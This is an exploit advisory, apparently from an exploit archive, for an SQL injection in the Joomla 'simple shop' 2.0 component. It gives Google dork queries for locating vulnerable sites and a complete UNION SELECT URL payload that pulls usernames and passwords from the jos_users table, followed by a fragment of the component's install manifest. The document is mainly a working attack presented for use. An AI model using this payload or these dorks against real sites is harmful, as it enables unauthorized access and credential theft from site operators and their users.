Joomla Component simple shop 2.0 SQL Injection Vulnerability

2008-02-23 00:00:00

###############################################################
#
# joomla com_simpleshop SQL Injection(section)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : [email protected]
#
################################################################
#
# DORK 1 : allinurl:"com_simpleshop"
#
# DORK 2 : allinurl: "com_simpleshop"section
#
################################################################
EXPLOIT :

index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################

<mosinstall type="component" version="4.5.2">
<name>simple shop</name>
<author>galore.co.za</author>
<creationDate>July 2007</creationDate>
<copyright>(C) 2000 - 2007 galore.co.za</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.galore.co.za</authorUrl>
<version>2.0</version>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.